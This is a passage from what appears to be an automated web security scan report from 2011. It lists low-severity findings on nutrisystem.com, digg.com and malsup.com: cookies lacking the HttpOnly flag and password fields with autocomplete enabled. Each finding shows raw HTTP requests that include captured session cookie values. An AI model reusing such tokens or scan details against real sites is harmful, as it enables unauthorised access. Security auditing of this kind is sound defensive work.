s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:53:50 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:53:50 GMT; Path=/
Set-Cookie: NSOfmCookieMarker=include; Domain=.nutrisystem.com; Expires=Fri, 11-Jan-2013 12:53:50 GMT; Path=/
Set-Cookie: mbox=; Domain=.nutrisystem.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 12:53:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta http-equiv="P3P" content='p
...[SNIP]...

6.47. http://www.nutrisystem.com/jsps_hmr/terms/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/terms/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/terms/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:57:33 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:57:33 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 12:57:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...

6.48. http://www.nutrisystem.com/jsps_hmr/tools_community/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/tools_community/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/tools_community/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:57:33 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:57:33 GMT; Path=/
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 12:57:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="P3P" content='pol
...[SNIP]...

6.49. http://www.nutrisystem.com/jsps_hmr/tracking/click.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/tracking/click.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/tracking/click.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:53:40 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:53:40 GMT; Path=/
Set-Cookie: NSOfmCookieMarker=include; Domain=.nutrisystem.com; Expires=Fri, 11-Jan-2013 12:53:40 GMT; Path=/
Set-Cookie: mbox=; Domain=.nutrisystem.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Location: http://www.nutrisystem.com/jsps_hmr/home/index.jsp?_requestid=618611
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 12 Jan 2011 12:53:40 GMT
Connection: close


6.50. http://www.nutrisystem.com/jsps_hmr/user/login.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/user/login.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jsps_hmr/user/login.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: DYN_USER_ID=242928229; Expires=Thu, 12-Jan-2012 12:53:51 GMT; Path=/
Set-Cookie: DYN_USER_CONFIRM=fa13a0481bf4c1d33ad9dfd7cabfb7a5; Expires=Thu, 12-Jan-2012 12:53:51 GMT; Path=/
Set-Cookie: NSOfmCookieMarker=include; Domain=.nutrisystem.com; Expires=Fri, 11-Jan-2013 12:53:51 GMT; Path=/
Set-Cookie: mbox=; Domain=.nutrisystem.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 12:53:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...

7. Password field with autocomplete enabled  previous  next
There are 39 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


7.1. http://digg.com/search  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:31:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=23348 10.2.129.156
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7669


<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Search
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, po
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

7.2. http://digg.com/submit  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:31:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899028811809024%3A154; expires=Thu, 13-Jan-2011 03:31:10 GMT; path=/; domain=digg.com
Set-Cookie: d=3b5b9a2fff23b5034f72836f0c1564901f30b745ea1e1762c0d50e4b67aefbde; expires=Mon, 11-Jan-2021 13:38:50 GMT; path=/; domain=.digg.com
X-Digg-Time: D=24431 10.2.129.145
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7385

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

7.3. http://digg.com/submit  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /submit?url= HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:35:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163899028811809024%3A154; expires=Thu, 13-Jan-2011 03:35:34 GMT; path=/; domain=digg.com
Set-Cookie: d=db13767ba9540a301565fea6e002af8216560e2a540a166f4d8c77e01281dd66; expires=Mon, 11-Jan-2021 13:43:14 GMT; path=/; domain=.digg.com
X-Digg-Time: D=24364 10.2.129.226
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7385

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

7.4. http://malsup.com/jquery/form/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://malsup.com
Path:   /jquery/form/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:47:38 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
<br />
<form id="test" action="dummy.php" method="post"><div>
...[SNIP]...
<td><input name="Password" type="password" value="" /></td>
...[SNIP]...

7.5. http://malsup.com/jquery/form/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://malsup.com
Path:   /jquery/form/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:47:38 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
</h3>
<form id="validateForm3" action="dummy.php" method="post"><div>
...[SNIP]...
<input type="text" name="username" />
Password: <input type="password" name="password" />
<input type="submit" value="Submit" />
...[SNIP]...

7.6. http://malsup.com/jquery/form/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://malsup.com
Path:   /jquery/form/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:47:38 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
</pre>
<form id="myForm2" action="dummy2.php" method="post"><div>
...[SNIP]...
<td><input name="Password" type="password" /></td>
...[SNIP]...

7.7. http://malsup.com/jquery/form/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://malsup.com
Path:   /jquery/form/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:47:38 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
</h3>
<form id="validateForm1" action="dummy.php" method="post"><div>
...[SNIP]...
<input type="text" name="username" />
Password: <input type="password" name="password" />
<input type="submit" value="Submit" />
...[SNIP]...

7.8. http://malsup.com/jquery/form/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://malsup.com
Path:   /jquery/form/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:47:38 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
</pre>
<form id="myForm1" action="dummy.php" method="post"><div>
...[SNIP]...
<td><input name="Password" type="password" /></td>
...[SNIP]...

7.9. http://malsup.com/jquery/form/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://malsup.com
Path:   /jquery/form/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:47:38 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
</h3>
<form id="validateForm2" action="dummy.php" method="post"><div>
...[SNIP]...
<input type="text" name="username" />
Password: <input type="password" name="password" />
<input type="submit" value="Submit" />
...[SNIP]...

7.10. http://www.nutrisystem.com/jsps_hmr/about/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/about/index.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/about/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/about/index.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.11. http://www.nutrisystem.com/jsps_hmr/careers/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/careers/index.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/careers/index.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=62633F40AB8B1C4C09BB5823A0564C69; NSOfmCookieMarker=exclude; fsr.s={"cp":{"evar18":"webmedia_webmedia1810#","evar8":"242836360","evar14":"New Member","evar2":""},"v":1}; BIGipServerNutriUSA_prod_static_lb=2837383690.20480.0000; s_sess=%20s_cmc%3DDirect%2520Load%3B%20s_cmrf%3DDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ATG_SESSION_ID=62633F40AB8B1C4C09BB5823A0564C69; fsr.a=1294800568513; BIGipServerNutriUSA_prod_lb=2837383690.62495.0000; mbox=check#true#1294800618|session#1294800539168-279209#1294802418|disable#true#1294804158; DYN_USER_CONFIRM=879f0ee4b0ab6f36d9cd7fddbf43dab8; s_pers=%20dfa_cookie%3Dnutrisystemprod1%7C1294802363567%3B%20s_cmp%3D%255B%255B'IID_29521%252523'%252C'1294800563576'%255D%255D%7C1452566963576%3B%20s_cmp1%3D%255B%255B'no_test%252523'%252C'1294800563577'%255D%255D%7C1452566963577%3B%20s_dl%3D1%7C1294802363579%3B; DYN_USER_ID=242836360; s_vi=[CS]v1|26968B4605013993-6000010B4000F0FF[CE];

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-ATG-Version: ATGPlatform/2006.3p6 [ DPSLicense/0 B2BLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Type: text/html;UTF-8;charset=UTF-8
Date: Wed, 12 Jan 2011 04:07:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...
</h3>

<form action="/jsps_hmr/user/login.jsp?_DARGS=/jsps_hmr/careers/index.jsp.login" name="login" method="post" id="loginForm"><input value="UTF-8" type="hidden" name="_dyncharset">
...[SNIP]...
</label>
    <input value="" maxlength="30" type="password" class="input-text" style="width: 210px; height:18px; line-height: 12px;" size="30" name="/nutrisystem/userprofiling/HMRProfileFormHandler.value.password" id="login-password"><input value=" " type="hidden" name="_D:/nutrisystem/userprofiling/HMRProfileFormHandler.value.password">
...[SNIP]...

7.12. http://www.nutrisystem.com/jsps_hmr/catalog/men/basic.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nutrisystem.com
Path:   /jsps_hmr/catalog/men/basic.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jsps_hmr/catalog/men/basic.jsp HTTP/1.1
Host: www.nutrisystem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
